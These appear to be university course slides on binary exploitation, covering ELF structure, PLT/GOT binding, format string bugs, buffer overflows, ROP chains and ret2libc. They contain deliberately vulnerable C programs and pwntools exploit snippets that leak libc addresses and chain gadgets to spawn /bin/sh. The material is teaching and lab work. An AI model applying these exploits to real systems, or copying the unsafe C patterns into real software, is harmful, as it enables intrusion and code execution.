ENPM809V

Exploitation Review and ROP Chain

What We Work On

  • ELF & Linking
  • Library And System Calls
  • Format String Exploit Review
  • ROP Chain and ret2libc

ELF & Linking

ELF Header

#define EI_NIDENT 16

typedef struct {
        unsigned char e_ident[EI_NIDENT];
        Elf32_Half    e_type;
        Elf32_Half    e_machine;
        Elf32_Word    e_version;
        Elf32_Addr    e_entry;
        Elf32_Off     e_phoff;
        Elf32_Off     e_shoff;
        Elf32_Word    e_flags;
        Elf32_Half    e_ehsize;
        Elf32_Half    e_phentsize;
        Elf32_Half    e_phnum;
        Elf32_Half    e_shentsize;
        Elf32_Half    e_shnum;
        Elf32_Half    e_shstrndx;
} Elf32_Ehdr;
$ readelf -h a.out       ###Output modified slightly  
  Magic:   7f 45 4c 46               \x7fELF
  Class:                             ELF32
  Data:                              little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048430
  Start of program headers:          52 
  Start of section headers:          8588 
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         35
  Section header string table index: 34

e_ -- elf

ph -- program header

sh -- section header

off -- offset

ent -- entry

e_shentsize -- Section Header Entry Size

e_shnum -- Section Header Number (of entries)

e_phentsize -- Program Header Entry Size

e_shstrndx -- Section Header String Table Index
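
The header fields can also be read programmatically. The following is a minimal sketch, assuming a little-endian ELF32 file; the names EHDR32, Ehdr, parse_ehdr32 and build_sample are made up for this example, and build_sample only fabricates a header with the values from the readelf output so the sketch runs without a real binary.

```python
import struct
from collections import namedtuple

# Field order mirrors Elf32_Ehdr: 16 identification bytes, then
# Half, Half, Word, Addr, Off, Off, Word and six more Halfs.
# "<" means little endian with no padding (assumption: ELF32, LSB).
EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")

Ehdr = namedtuple(
    "Ehdr",
    "e_ident e_type e_machine e_version e_entry e_phoff e_shoff e_flags "
    "e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx",
)


def parse_ehdr32(data: bytes) -> Ehdr:
    """Unpack the first 52 bytes of a file as an ELF32 header."""
    hdr = Ehdr._make(EHDR32.unpack_from(data))
    if hdr.e_ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return hdr


def build_sample() -> bytes:
    """Fabricated header that reuses the numbers from the readelf output."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
    return EHDR32.pack(ident, 2, 3, 1, 0x8048430, 52, 8588, 0,
                       52, 32, 9, 40, 35, 34)


if __name__ == "__main__":
    hdr = parse_ehdr32(build_sample())
    print(hex(hdr.e_entry), hdr.e_shnum, hdr.e_shstrndx)
```

To try it on a real 32-bit binary, pass the first 52 bytes of the file to parse_ehdr32 instead of the fabricated sample.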

### modified output 
  [Nr] Name              Type      
  [ 0]                   NULL      
  [ 1] .interp           PROGBITS  
  [ 2] .note.ABI-tag     NOTE      
  [ 3] .note.gnu.build-i NOTE      
  [ 4] .gnu.hash         GNU_HASH  
  [ 5] .dynsym           DYNSYM    
  [ 6] .dynstr           STRTAB    
  [ 7] .gnu.version      VERSYM    
  [ 8] .gnu.version_r    VERNEED   
  [ 9] .rela.dyn         RELA      
  [10] .rela.plt         RELA      
  [11] .init             PROGBITS  
  [12] .plt              PROGBITS  
  [13] .plt.got          PROGBITS  
  [14] .text             PROGBITS  
  [15] .fini             PROGBITS  
  [16] .rodata           PROGBITS  
  [17] .eh_frame_hdr     PROGBITS  
  [18] .eh_frame         PROGBITS  
  [19] .init_array       INIT_ARRAY
  [20] .fini_array       FINI_ARRAY
  [21] .data.rel.ro      PROGBITS  
  [22] .dynamic          DYNAMIC   
  [23] .got              PROGBITS  
  [24] .data             PROGBITS  
  [25] .bss              NOBITS    
  [26] .gnu_debuglink    PROGBITS  
  [27] .shstrtab         STRTAB 

Section Header

  • A header entry that describes one section of the binary (name, type, offset, size)
    • The section contents themselves are usually unstructured

Examples: .text, .got, .data

Run the command readelf -S /bin/bash

Program Header

  • Indicates how segments required for execution are to be loaded into virtual memory.
  • There exists a Sections to Segment mapping that specifies which sections are part of which segments.

 

Binary Layout

 
  • Does it matter where the Program and Section headers are in the binary?
  • Where must the ELF Header always exist?
  • Are all Section or Program headers needed?

How do multiple source files become a single executable?

ELF file formats:

  • Executable file
  • Shared Object file
  • Relocatable file
  • and some others

ELF Header specifies the file format

 + Executable: specifies how to load the program into a process image (remember exec and forking?)

 

 + Relocatable: specifies how to include its own code and data into an Executable or Shared object. Object files waiting to be included.

 

 + Shared Object: Dynamic library that is linked with an executable at load time by the dynamic linker. Think libc, which provides printf.

Linker links objects with shared libraries.

What does the whole pipeline look like then?

1. GCC compiles into ELF Relocatables

 

2. Static linker links Relocatables and attaches necessary information for Shared Object linking into an Executable

 

3. Loader execs the Executable, then the dynamic linker actually links to the Shared Objects for code execution. 

Library and System Calls

What Are They

  • Library Calls: calls to functions that are linked into a binary
  • System Calls: a process's way of asking the kernel to do something with a resource on its behalf
    • System call numbers and calling conventions differ between operating systems and architectures

How do Library Calls Work

  1. At link time, the static linker records which shared objects the binary needs and creates PLT and GOT entries for the imported functions
  2. At run time, the dynamic linker maps the shared objects and sets up the Global Offset Table (GOT) in memory
  3. Function is called: the call goes to the function's PLT stub, which jumps through the matching GOT entry
    1. The Procedure Linkage Table (PLT) facilitates what is called lazy binding in programs. Binding is the fix-up process in which the dynamic linker writes a symbol's real address into its GOT entry. When an entry has been "fixed up" it is said to be "bound" to its real address.
  4. Once the entry is bound, the PLT stub jumps straight to the function in the shared object

Reference: https://bottomupcs.sourceforge.net/csbu/x3882.htm
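
The lazy binding steps above can be modelled in a few lines. This is a toy sketch only: ToyProcess, plt_call and _resolve are invented names, the "library" is a plain dictionary, and the real dynamic linker works on machine code and relocation records rather than Python objects.

```python
class ToyProcess:
    """Toy model of lazy binding; not how ld.so is actually implemented."""

    def __init__(self, library):
        self.library = library      # stands in for the shared object
        self.got = {}               # name -> bound function address
        self.resolver_calls = 0     # how often the "dynamic linker" ran

    def _resolve(self, name):
        # Stand-in for the dynamic linker's symbol lookup.
        self.resolver_calls += 1
        return self.library[name]

    def plt_call(self, name, *args):
        # The PLT stub jumps through the GOT entry. On first use the
        # entry is unbound, so the resolver runs and patches the GOT.
        if name not in self.got:
            self.got[name] = self._resolve(name)
        return self.got[name](*args)


if __name__ == "__main__":
    proc = ToyProcess({"strlen": len})
    print(proc.plt_call("strlen", b"hello"))   # first call: resolves, then calls
    print(proc.plt_call("strlen", b"hi"))      # second call: GOT entry already bound
    print(proc.resolver_calls)
```

The point of the model is that the lookup cost is paid once per function, and only for functions that are actually called.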

How do System Calls Work?

  • User code calls a function that makes a system call
    • e.g. open, write, read, etc.
    • Can call syscall() function directly
  • The Libc function makes a request to the kernel
  • The kernel looks up the system call requested
  • The kernel executes the system call, which then performs the desired action
  • The kernel returns the result to the user process
  • Read man 2 syscall

I saw you said libc... what is that?

The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages).

-wikipedia

What is happening when we use printf in our binaries?

Ensure that we have the proper #include (stdio.h) so the compiler knows printf's declaration

- The call goes to printf's entry in the PLT, which jumps to the address stored in printf's GOT entry

      - Once resolved, the GOT entry holds the absolute memory address of the code. The PLT delays the cost of looking it up until the first call.

      - We do this to save startup time: functions that are never called are never looked up.

How does text make it to the screen?

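     read, write, open, etc. are thin libc wrappers around system calls.

     printf and malloc are higher-level library functions that end up

     making system calls (for example write, or brk/mmap).

     System calls are the process's way of asking the kernel to do

     something with a resource on its behalf.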
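
The difference between a thin wrapper and a buffered library layer can be illustrated from Python, whose os.write hands data directly to write(2). This is only a sketch of the idea: the two function names are made up for this example, and Python's buffered stream is used as a stand-in for what printf does in libc.

```python
import io
import os


def write_via_wrapper(fd: int, text: str) -> int:
    """os.write is a thin wrapper: one call, one write(2) system call."""
    return os.write(fd, text.encode())


def write_via_buffered_layer(fd: int, text: str) -> None:
    """A buffered layer (similar in spirit to printf) collects data in
    user space and only reaches the kernel when the buffer is flushed."""
    with io.open(fd, "w", closefd=False) as stream:
        stream.write(text)   # data sits in a user-space buffer
        stream.flush()       # now it is handed to write(2)


if __name__ == "__main__":
    write_via_wrapper(1, "written directly\n")
    write_via_buffered_layer(1, "written through a buffer\n")
```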

 

Format String Vulnerabilities

What is it?

  • When user-controlled input is used as the format string itself instead of being passed as an argument.
    • Perfect example is printf(user_input); the safe form is printf("%s", user_input);
  • What can this lead to?
    • Arbitrary Code Execution
    • Leakage of information

Example

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}

How is it vulnerable?

$ ./fmt_string
Enter Input: %7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!

Useful Format Strings

  • %c - read character from the stack
  • %d, %i, %x - read an integer (4 bytes) from the stack (%x is in hex)
  • %s - de-reference a pointer and read until null byte is hit
  • %hx - leaks two bytes
  • %hhx - Leaks one byte
  • %lx - leaks 8 bytes
  • %n$x - leaks 4 bytes from the nth argument
    • Example: %7$x - prints the 7th argument (on x86-64 Linux the first five come from registers, the rest from the stack)
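
How the length modifiers change what gets leaked can be shown with a small model. This is a toy sketch, not printf: the function name leak and the idea of treating every argument as one 64-bit slot are assumptions made for illustration, and only the positional hex forms from the list above are handled.

```python
import re


def leak(fmt: str, slots: list) -> str:
    """Expand %N$hhx, %N$hx, %N$x, %N$lx and %N$llx against a list of
    64-bit argument slots (N is 1-indexed, as in printf)."""
    masks = {"hh": 0xFF, "h": 0xFFFF, "": 0xFFFFFFFF,
             "l": 2**64 - 1, "ll": 2**64 - 1}

    def expand(match):
        index, length = int(match.group(1)), match.group(2)
        # The length modifier decides how many low bytes are printed.
        return format(slots[index - 1] & masks[length], "x")

    return re.sub(r"%(\d+)\$(hh|h|ll|l|)x", expand, fmt)


if __name__ == "__main__":
    # Slot 7 holds the value seen in the example run above.
    slots = [0] * 6 + [0x8BADF00D3EA43EEF]
    for fmt in ("%7$llx", "%7$x", "%7$hx", "%7$hhx"):
        print(fmt, "->", leak(fmt, slots))
```

With %7$x only the low four bytes of the slot would appear, which is why the example run uses %7$llx to reach the secret in the upper half.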

Executing Data

  • For executing data, we need to utilize %n and its variants
    • %n treats the matching argument as a pointer and writes to that address the number of bytes printed so far.
    • Why is this bad?
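
To make the danger concrete, here is a sketch of how an attacker turns %n into a chosen write: pad the output until the printed-byte count equals the wanted byte, then store it with %hhn. The function name hhn_payload and its parameters are made up for this example, and it assumes the target addresses are already positioned so printf sees them as consecutive arguments.

```python
def hhn_payload(value: int, first_arg_index: int,
                width: int = 4, printed: int = 0) -> str:
    """Build the format-string part that writes `value` one byte at a time.

    Assumes the addresses addr, addr+1, ... are already placed so that
    printf sees them as arguments first_arg_index, first_arg_index+1, ...
    """
    parts = []
    for i in range(width):
        target = (value >> (8 * i)) & 0xFF      # little endian: low byte first
        pad = (target - printed) % 256          # %hhn stores the count modulo 256
        if pad:
            parts.append(f"%1${pad}c")          # prints exactly `pad` characters
            printed += pad
        parts.append(f"%{first_arg_index + i}$hhn")
    return "".join(parts)


if __name__ == "__main__":
    print(hhn_payload(0x1337BABE, first_arg_index=10))
```

Writing byte by byte keeps the padding below 256 characters per write; a single %n for 0x1337babe would need hundreds of millions of characters of output.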

Executing Shellcode

Executing Shellcode Via Pwntools

from pwn import *

p = process('./vulnerable')

# Send one payload to the target and return whatever it prints back
def send_payload(payload):
        log.info("payload = %s" % repr(payload))
        p.sendline(payload)
        return p.recv()

# Create a FmtStr object and hand it the send function;
# it uses that function to work out the format string offset
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe) # queue: write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0) # queue: write 0x0 at 0x1337babe
format_string.execute_writes()       # send the queued writes

Classwork

  • What can be found from the format string vulnerability?
  • What part of memory can we leak?
  • See if you can execute shellcode
  • Spend 10-20 minutes on it

Buffer Overflow and ROP

Classic Buffer Overflow

int some_function()
{
    char buffer[128];
    gets(buffer);            /* no bounds check: long input overwrites the saved return address */
    printf("%s\n", buffer);
    return 0;
}

Bypassing Mitigations

  • RET2LIBC
  • Address Leakage

ROP Chain

  • ROP stands for return-oriented programming
  • A way of bypassing non-executable stack protection.
  • Reuses code in shared objects or the program itself
  • Classic example is RET2LIBC

ROP Chain - How it Works

  • Overflow the buffer to overwrite the saved return address with the address of a gadget
    • A gadget is a short instruction sequence that ends in ret, such as pop rdi; ret
  • Each ret returns to the next address you placed on the stack (the next gadget)
  • Chain as many of these gadgets together as needed to create the desired effect
    • Example: create a ROP chain that executes /bin/sh via syscall
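
The way consecutive ret instructions walk an attacker-controlled stack can be traced with a toy interpreter. Everything here is hypothetical: the gadget addresses, the EXECVE address and the run_chain function are invented for illustration, and only pop gadgets are modelled.

```python
# Hypothetical gadget addresses mapped to the registers they pop.
GADGETS = {
    0x401000: ["rdi"],          # pop rdi; ret
    0x401010: ["rsi"],          # pop rsi; ret
    0x401020: ["rdx", "r12"],   # pop rdx; pop r12; ret
}
EXECVE = 0x401100               # hypothetical address of the final target


def run_chain(stack: list) -> dict:
    """Walk the stack the way a series of `ret` instructions would."""
    regs = {}
    sp = 0
    while sp < len(stack):
        target = stack[sp]              # `ret` pops the next address into rip
        sp += 1
        if target == EXECVE:
            regs["rip"] = target        # chain finished: registers are set up
            break
        for reg in GADGETS[target]:     # each `pop` consumes one stack slot
            regs[reg] = stack[sp]
            sp += 1
    return regs


if __name__ == "__main__":
    chain = [0x401020, 0, 0xDEAD,       # rdx = 0, r12 = filler
             0x401010, 0,               # rsi = 0
             0x401000, 0x7FFF0000,      # rdi = pointer to "/bin/sh" (made up)
             EXECVE]
    print(run_chain(chain))
```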

What this looks like

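#include <stdio.h>
#include <string.h>

void rop1()
{
	printf("1\n");
}

void rop2()
{
	printf("2\n");
}

void rop3()
{
	printf("3\n");
}

void vuln(char *str)
{
	char buffer[100];
	strcpy(buffer, str);	/* no length check */
}

int main(int argc, char** argv)
{
	vuln(argv[1]);
	return 0;
}

# 108 bytes of filler reach the saved return address in this particular build
payload = b"\x90"*108 + rop1_addr + rop2_addr + rop3_addr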

output:
1
2
3
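
A payload like the one above can be assembled with the standard library alone. This is a sketch under assumptions: build_payload is a made-up helper, the three addresses are invented, and 32-bit packing is assumed because strcpy stops at the first NUL byte, which rules out addresses that contain zero bytes.

```python
import struct


def build_payload(offset: int, addresses: list, word: str = "<I",
                  forbid_nul: bool = True) -> bytes:
    """Filler up to the saved return address, then one packed
    little-endian address per `ret`."""
    payload = b"A" * offset
    payload += b"".join(struct.pack(word, addr) for addr in addresses)
    if forbid_nul and b"\x00" in payload:
        # strcpy (and argv itself) would cut the payload at the first NUL.
        raise ValueError("payload contains a NUL byte")
    return payload


if __name__ == "__main__":
    # Made-up addresses standing in for rop1, rop2 and rop3.
    payload = build_payload(108, [0x080491B6, 0x080491E1, 0x0804920C])
    print(len(payload), payload[108:].hex())
```

The offset of 108 is taken from the slide; on another compiler or architecture it has to be measured again.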

Important Gadgets

  • Find resources on the stack - (such as finding /bin/sh or /bin/cat)
  • Fixup Gadgets - Meant to fix up the stack (skip over values you do not want to return into)
    • Examples are pop r12; pop rdi; pop rsi; ret
    • add rsp, 0x40; ret
  • Storing values into registers
    • pop rdx; ret

ROP Chain

[*] rop2 Chain dump:
    0x0000:     0x7f34ab6b15 pop rdx; pop r12; ret
    0x0008:              0x0 [arg2] rdx = 0
    0x0010:      b'eaaafaaa' <pad r12>
    0x0018:     0x7f349c1ccd pop rsi; ret
    0x0020:              0x0 [arg1] rsi = 0
    0x0028:         0x4013a3 pop rdi; ret
    0x0030:     0x7f34b51d4e [arg0] rdi = 546345131342
    0x0038:     0x7f34a80a94 execve

How Did we Get that ROP Chain?

  • Need to understand what parameters need to be set
  • How to set them
  • Find the gadgets
  • Construct the ROP chain

Finding Gadgets

ROPGadget

https://github.com/JonathanSalwan/ROPgadget

Ropper

https://github.com/sashs/Ropper
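
At their core, these tools scan executable bytes for instruction sequences that end in ret. The sketch below shows the idea for one-byte pop instructions only; find_pop_ret is a made-up name, the base address is invented, and real tools decode many more instruction forms.

```python
# One-byte x86-64 encodings: 0x58 + register number is `pop REG`, 0xC3 is `ret`.
POP_REG = {0x58: "rax", 0x59: "rcx", 0x5A: "rdx", 0x5B: "rbx",
           0x5D: "rbp", 0x5E: "rsi", 0x5F: "rdi"}
RET = 0xC3


def find_pop_ret(code: bytes, base: int = 0) -> list:
    """Return (address, text) for every `pop REG` directly followed by `ret`."""
    hits = []
    for i in range(len(code) - 1):
        if code[i] in POP_REG and code[i + 1] == RET:
            hits.append((base + i, f"pop {POP_REG[code[i]]}; ret"))
    return hits


if __name__ == "__main__":
    # 41 5f c3 is `pop r15; ret`; skipping the 0x41 prefix yields `pop rdi; ret`.
    code = bytes.fromhex("415fc3 90 5ec3")
    for addr, text in find_pop_ret(code, base=0x401000):
        print(hex(addr), text)
```

Because the scan starts at every byte offset, it also finds gadgets that begin in the middle of an instruction the compiler actually emitted.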

Open homework or classwork. Find some gadgets for 10 minutes

Pwntools

#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

Common Gadgets

  • ret - at the end of every function
  • leave; ret - at the end of many functions
  • pop REG; ret - restoring callee-saved registers
  • mov rax, REG; ret - setting the return value (always in RAX)

 

Although these are common, you don't have to use just these. You can search for any combination of instructions.

Other Important Concepts

Procedure Linkage Table

  • What is actually called when a dynamically linked binary calls a library function
  • If the GOT entry for the function is resolved, jumps immediately there
  • If the GOT entry is not resolved, it first has the dynamic linker resolve the GOT entry, then jumps to it

Global Offset Table

  • A table of addresses holding the in-memory locations of library functions (such as those in libc)
    • These are the addresses of the actual functions
  • To summarize: the PLT redirects code execution to the address stored in the GOT.
  • If the entry is not yet resolved, the PLT stub calls into ld.so (the dynamic linker/loader) to get the function address and store it in the GOT.

Why is this important?

Needed for ret2libc! (homework)

Ret2libc

ret2libc

  • Redirecting the binary's control flow so that it returns into code in the system's libc
  • Helps us to bypass NX or DEP

Ret2libc - system("/bin/sh")

  • Get base address of libc
    • If ASLR is enabled, we need to leak this
  • Add padding up to the saved return address
  • Find the address of pop rdi; ret
  • Find the address of the "/bin/sh" string
  • Find the address of "system"
  • Say where you want to return to

How can we find these gadgets?

You do that right now! Use ropper/ROPGadget to find them.

What does this look like?

# pwntools example

rop = ROP([binary, libc])
binsh = next(libc.search(b"/bin/sh"))
rop.execve(binsh, 0, 0)

rop.dump()

'''output

[*] rop Chain dump:                                                                                           
    0x0000:     0x7f69246a85 pop rdx; pop r12; ret                                                             
    0x0008:              0x0 [arg2] rdx = 0                                                                    
    0x0010:      b'eaaafaaa' <pad r12>                                                                         
    0x0018:     0x7f69153673 pop rsi; ret                                                                      
    0x0020:              0x0 [arg1] rsi = 0                                                                    
    0x0028:         0x4013a3 pop rdi; ret                                                                      
    0x0030:     0x7f692e1c11 [arg0] rdi = 547225476113                                                         
    0x0038:     0x7f692107c4 execve    
    
'''
payload = padding + rop.chain()

### without pwntools gadget finder

# You need to work out these addresses yourself
# from the binary and from libc
libc_base = 0x12345678  # placeholder; leak the real value if ASLR is on
POP_RDI = pop_rdi_addr 
system = libc_base + offset_system_addr
binsh = libc_base + offset_binsh_addr

payload = padding
payload += p64(POP_RDI)
payload += p64(binsh)
payload += p64(system)
payload += p64(whatever_you_want_to_ret_to)

What if we need libc base address?

int vuln()
{
	char buffer[128]; 
    gets(buffer);
    printf("%s\n", buffer);
}

  • Utilize the PLT and GOT to resolve a function and print its address
  • Subtract that function's offset within libc from the leaked address to get the libc base.

We need a place to receive input

payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beginning_of_vuln

# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()

'''
[*] Rop1 chain dump:                                                                                                                                                                    
    0x0000:         0x4013a3 pop rdi; ret                                                                                                                                               
    0x0008:         0x404028 [arg0] rdi = got.puts                                                                                                                                      
    0x0010:         0x4010c4 puts                                                                                                                                                       
    0x0018:         0x401316 0x401316() 
'''

libc = ELF("/path/to/libc.so.6")

io.sendline(payload)
addr = io.recvline()

#parse the address received

addr = addr.strip()
leak = u64(addr.ljust(8, b"\x00"))

libc.address = leak-libc.symbols["puts"]
log.info("libc base address = 0x{:x}".format(libc.address))
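
The parsing and subtraction can also be done without pwntools, which makes it easy to add a sanity check. This is a sketch under assumptions: parse_leak and libc_base are made-up helpers, and the leaked bytes and the 0x80e20 offset are invented values, not taken from any particular libc.

```python
import struct


def parse_leak(line: bytes) -> int:
    """Turn the raw bytes printed by puts() into an integer address."""
    raw = line[:-1] if line.endswith(b"\n") else line
    if not 0 < len(raw) <= 8:
        raise ValueError("unexpected leak length")
    # puts() stops at the first NUL, so the high zero bytes are missing.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset within libc from its leaked address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # Libraries are mapped on page boundaries.
        raise ValueError("base is not page-aligned; wrong libc or symbol?")
    return base


if __name__ == "__main__":
    leak = parse_leak(b"\x20\x5e\x08\xf7\xff\x7f\n")   # made-up leak of puts
    print(hex(leak), hex(libc_base(leak, 0x80E20)))    # made-up offset of puts
```

A base address that is not page-aligned usually means the offset came from a different libc build than the one the target is running.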

Putting it all together

  • Get the libc base address
    • Leak it somehow
    • Format string or printing it out via another ROP Chain
  • Find the gadgets to execute the functions you want (from libc and the binary)
  • Construct the ROP chain to execute what you'd like
  • Execute!

Work on the homework!